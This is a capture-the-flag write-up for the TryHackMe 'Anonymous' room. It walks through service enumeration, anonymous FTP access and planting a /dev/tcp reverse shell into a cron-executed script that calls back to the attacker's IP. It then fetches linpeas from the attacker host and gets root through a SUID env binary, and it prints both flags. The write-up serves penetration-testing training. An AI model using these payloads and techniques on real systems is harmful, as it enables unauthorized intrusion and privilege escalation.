A quite minimalistic CTF from tryhackme.com – lets dive right in:
What does nmap say?
sudo nmap -sV 10.10.51.126
![](https://i0.wp.com/cybersecbits.com/wp-content/uploads/2021/04/anonymous_nmap.png?fit=1020%2C273&ssl=1)
There we have the first answers to the challenge: 4 Services are running, FTP on 21 and smb on 139 and 445.
Now we need to look at the smb shares:
smbclient -L10.10.51.126
![](https://i0.wp.com/cybersecbits.com/wp-content/uploads/2021/04/anonymous_smbclinet-l.png?fit=1020%2C170&ssl=1)
Next answer: the share we are looking for is pics.
Now we are looking for the flags.
Let’s see what ftp can do for us.
ftp 10.10.51.126
Anonymous login works.
![](https://i0.wp.com/cybersecbits.com/wp-content/uploads/2021/04/anonymous_ftp-anonymous.png?fit=1020%2C409&ssl=1)
That looks good. 3 files, we can read all of them and write to the shell script. Lets download them and look into them.
get clean.sh
get removed_files.log
get to_do.txt
to_do.txt only tells us that the admin is planning to block anonymous access. Good idea but doesn*t help.
So let’s cat out removed_files.log
cat removed_files.log
![](https://i0.wp.com/cybersecbits.com/wp-content/uploads/2021/04/anonymous_cat-log.png?fit=1020%2C223&ssl=1)
Not too interesting either.
Let’s move on to the bash script.
cat clean.sh
![](https://i0.wp.com/cybersecbits.com/wp-content/uploads/2021/04/anonymous_cat-clean-sh.png?fit=1020%2C216&ssl=1)
Now things are beginning to make sense.
clean.sh writes into the removed_files.log. Knowing that there where a lot of lines in the log file we can assume that clean.sh is automatically and periodically called by a cron job.
We also know that we can write to the file. So let’s just plant a reverse shell into that script, setup netcat on our side and see if we get a shell when eventually on the target the cron job fires.
#!/bin/bash
exec 5<>/dev/tcp/10.11.30.88/1234
cat <&5 | while read line; do $line 2>&5 >&5; done
And in out ftp session:
put clean.sh clean.sh
On our local machine we start our usual netcat listener
nc -l 1234
and wait …
![](https://i0.wp.com/cybersecbits.com/wp-content/uploads/2021/04/anonymous_nc-connect.png?fit=1020%2C87&ssl=1)
And here we go. Let’s look around.
whoami
pwd
ls -la
![](https://i0.wp.com/cybersecbits.com/wp-content/uploads/2021/04/anonymous_nc-whoami-pwd-ls-la.png?fit=1020%2C367&ssl=1)
We found the user flag
90d6f992585815ff991e68748c414740
To get ideas on how to become root let’s use linpeas.
We start a webserver locally and upload the file to our target.
So on our local machine:
python3 -m http.server
And on the target machine:
wget http://10.11.30.88:8000/linpeas.sh
![](https://i0.wp.com/cybersecbits.com/wp-content/uploads/2021/04/anonymous_wget-linpeace.png?fit=1020%2C230&ssl=1)
chmod +x linpeas.sh
./linpeas.sh
In the SUID sections we find this line
-rwsr-xr-x 1 root root 35K Jan 18 2018 /usr/bin/env
With this we find something on
https://gtfobins.github.io/gtfobins/env/#suid
From there we use
env /bin/sh -p
and we are root.
whoami
root
cat /root/root.txt
So our root flag is
4d930091c31a622a7ed10f27999af363